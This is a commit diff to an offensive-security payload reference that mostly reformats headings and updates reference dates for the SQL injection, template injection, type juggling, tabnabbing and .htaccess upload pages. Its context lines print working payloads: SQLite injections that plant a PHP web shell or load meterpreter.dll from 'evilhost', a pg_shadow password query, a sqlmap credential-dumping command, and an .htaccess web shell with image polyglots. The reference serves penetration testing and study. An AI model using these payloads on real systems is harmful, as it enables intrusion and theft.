References addded for SQLi, Upload, SSTI, Type Juggling

SQL Injection/MySQL Injection.md

@@ -695,7 +695,7 @@ Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the back
 - [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
 - [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
 - [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
-- [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - 2024](https://sqlwiki.netspi.com/injectionTypes/errorBased)
+- [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased)
 - [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
 - [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
 - [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://resources.infosecinstitute.com/sql-truncation-attack/)

SQL Injection/PostgreSQL Injection.md

@@ -71,11 +71,15 @@ SELECT usename FROM pg_user
 ```sql
 SELECT usename, passwd FROM pg_shadow 
 ```
+
 ## PostgreSQL List Database Administrator Accounts
+
 ```sql
 SELECT usename FROM pg_user WHERE usesuper IS TRUE
 ```
+
 ## PostgreSQL List Privileges
+
 Gather information from the [`pg_user`](https://www.postgresql.org/docs/current/view-pg-user.html) table:
 ```sql
 SELECT * FROM pg_user
@@ -155,6 +159,7 @@ Note, with the above queries, the output needs to be assembled in memory. For la
 ```
 
 ## PostgreSQL Time Based
+
 #### Identify time based
 
 ```sql

SQL Injection/README.md

@@ -354,17 +354,17 @@ Bypass using LIKE/NOT IN/IN/BETWEEN
 
 ## Labs 
 
-* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
-* [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
-* [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
-* [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
+* [PortSwigger - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
+* [PortSwigger - SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
+* [PortSwigger - SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
+* [PortSwigger - SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
 
 
 ## References
 
 * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection - Not So Secure - February 9, 2018](https://web.archive.org/web/20180209143119/https://www.notsosecure.com/analyzing-cve-2018-6376/)
 * [Manual SQL Injection Discovery Tips - Gerben Javado - August 26, 2017](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
-* [NetSPI SQL Injection Wiki - NetSPI - 2024](https://sqlwiki.netspi.com/)
+* [NetSPI SQL Injection Wiki - NetSPI - December 21, 2017](https://sqlwiki.netspi.com/)
 * [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
 * [SQLi Cheatsheet - NetSparker - March 19, 2022](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
 * [SQLi in INSERT worse than SELECT - Mathias Karlsson - Feb 14, 2017](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)

SQL Injection/SQLite Injection.md

@@ -12,8 +12,9 @@
 * [Boolean - Extract info](#boolean---extract-info)
 * [Boolean - Error based](#boolean---error-based)
 * [Time based](#time-based)
-* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
-* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
+* [Remote Code Execution](#remote-code-execution)
+    * [Attach Database](#attach-database)
+    * [Load_extension](#load_extension)
 * [References](#references)
 
 
@@ -100,15 +101,17 @@ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
 ```
 
 
-## Remote Command Execution using SQLite command - Attach Database
+## Remote Code Execution
+
+### Attach Database
 
 ```sql
 ATTACH DATABASE '/var/www/lol.php' AS lol;
 CREATE TABLE lol.pwn (dataz text);
 INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
 ```
 
-## Remote Command Execution using SQLite command - Load_extension
+### Load_extension
 
 ```sql
 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--

SQL Injection/SQLmap.md

@@ -24,12 +24,14 @@ However you should always know how SQLmap is working, and be able to replicate i
 * [SQLmap Without SQL Injection](#sqlmap-without-sql-injection)
 * [References](#references)
 
+
 ## Basic Arguments For SQLmap
 
 ```powershell
 sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
 ```
 
+
 ## Load A Request File
 
 A request file in SQLmap is a saved HTTP request that SQLmap reads and uses to perform SQL injection testing. This file allows you to provide a complete and custom HTTP request, which SQLmap can use to target more complex applications.

Server Side Template Injection/ExpressionLanguage.md

@@ -88,8 +88,8 @@ ${facesContext.getExternalContext().setResponseHeader("output","".getClass().for
 
 - [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE)
 - [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
-- [Expression Language Injection - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
-- [Expression Language injection - PortSwigger - 2024](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
+- [Expression Language Injection - OWASP - December 4, 2019](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
+- [Expression Language injection - PortSwigger - January 27, 2019](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
 - [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
 - [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
 - [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)

Server Side Template Injection/Java.md

@@ -281,7 +281,7 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val
 ## References
 
 - [Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
-- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle @albinowax - December 10, 2015](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
-- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
-- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle @albinowax - December 28, 2015](https://www.youtube.com/watch?v=3cT0uE7Y87s)
+- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle (@albinowax) - December 10, 2015](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
+- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
+- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015](https://www.youtube.com/watch?v=3cT0uE7Y87s)
 - [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)

Server Side Template Injection/Ruby.md

@@ -8,7 +8,7 @@
     - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
     - [Ruby - List files and directories](#ruby---list-files-and-directories)
     - [Ruby - Remote Command execution](#ruby---remote-Command-execution)
-- [References](#referenecs)
+- [References](#references)
 
 
 ## Templating Libraries

Tabnabbing/README.md

@@ -14,7 +14,7 @@
 
 ## Tools
 
-- [PortSwigger/discovering-reversetabnabbing](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30)
+- [PortSwigger/discovering-reversetabnabbing](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) - Discovering Reverse Tabnabbing
 
 
 ## Description
@@ -43,5 +43,5 @@ Search for the following link formats:
 
 ## References
 
-* [Reverse Tabnabbing - OWASP, 20.10.20](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
-* [Tabnabbing - Wikipedia, 20.10.20](https://en.wikipedia.org/wiki/Tabnabbing)
+- [Reverse Tabnabbing - OWASP - October 20, 2020](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
+- [Tabnabbing - Wikipedia - May 25, 2010](https://en.wikipedia.org/wiki/Tabnabbing)

Type Juggling/README.md

@@ -43,6 +43,7 @@
 ![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)
 
 Loose Type Comparisons occurs in many languages:
+
 * [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
 * [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
 * [NodeJS](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/NodeJS)
@@ -141,8 +142,8 @@ The exploitation phase is the following:
 
 ## References
 
-* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
-* [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
-* [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
-* [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes)
-* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html)
+- [(Super) Magic Hashes - myst404 (@myst404_) - October 7, 2019](https://offsec.almond.consulting/super-magic-hash.html)
+- [Magic Hashes - Robert Hansen - May 11, 2015](http://web.archive.org/web/20160722013412/https://www.whitehatsec.com/blog/magic-hashes/)
+- [Magic hashes – PHP hash "collisions" - Michal Špaček (@spaze) - May 6, 2015](https://github.com/spaze/hashes)
+- [PHP Magic Tricks: Type Juggling - Chris Smith (@chrismsnz) - August 18, 2020](http://web.archive.org/web/20200818131633/https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
+- [Writing Exploits For Exotic Bug Classes: PHP Type Juggling - Tyler Borland (TurboBorland) - August 17, 2013](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)

Upload Insecure Files/Configuration Apache .htaccess/README.md

@@ -1,9 +1,23 @@
-# .htaccess upload
+# .htaccess
 
 Uploading an .htaccess file to override Apache rule and execute PHP.
 "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
 
-Self contained .htaccess web shell
+## Summary
+
+* [AddType Directive](#addtype-directive)
+* [Self Contained .htaccess](#self-contained-htaccess)
+* [Polyglot .htaccess](#polyglot-htaccess)
+* [References](#references)
+
+
+## AddType Directive
+
+Upload an .htaccess with : `AddType application/x-httpd-php .rce`   
+Then upload any file with `.rce` extension.
+
+
+## Self Contained .htaccess
 
 ```python
 # Self contained .htaccess web shell - Part of the htshell project
@@ -25,47 +39,43 @@ AddType application/x-httpd-php .htaccess
 <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
 ```
 
-# .htaccess simple php
-
-Upload an .htaccess with : `AddType application/x-httpd-php .rce`   
-Then upload any file with `.rce` extension.
 
-# .htaccess upload as image
+## Polyglot .htaccess
 
 If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. 
 
 [Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot.
 
-```python
-# create valid .htaccess/xbm image
 
-width = 50
-height = 50
-payload = '# .htaccess file'
+* Create valid `.htaccess/xbm` image
+    ```python
+    width = 50
+    height = 50
+    payload = '# .htaccess file'
+
+    with open('.htaccess', 'w') as htaccess:
+        htaccess.write('#define test_width %d\n' % (width, ))
+        htaccess.write('#define test_height %d\n' % (height, ))
+        htaccess.write(payload)
+    ```
+
+* Create valid `.htaccess/wbmp` image
+    ```python
+    type_header = b'\x00'
+    fixed_header = b'\x00'
+    width = b'50'
+    height = b'50'
+    payload = b'# .htaccess file'
+
+    with open('.htaccess', 'wb') as htaccess:
+        htaccess.write(type_header + fixed_header + width + height)
+        htaccess.write(b'\n')
+        htaccess.write(payload)
+    ```
 
-with open('.htaccess', 'w') as htaccess:
-    htaccess.write('#define test_width %d\n' % (width, ))
-    htaccess.write('#define test_height %d\n' % (height, ))
-    htaccess.write(payload)
-```
-or
-```python
-# create valid .htaccess/wbmp image
-
-type_header = b'\x00'
-fixed_header = b'\x00'
-width = b'50'
-height = b'50'
-payload = b'# .htaccess file'
-
-with open('.htaccess', 'wb') as htaccess:
-    htaccess.write(type_header + fixed_header + width + height)
-    htaccess.write(b'\n')
-    htaccess.write(payload)
-```
 
-## Thanks to
+## References
 
-* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
-* [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
-* [Writeup to l33t-hoster task, Insomnihack Teaser 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)
+* [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
+* [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015 ](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
+* [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)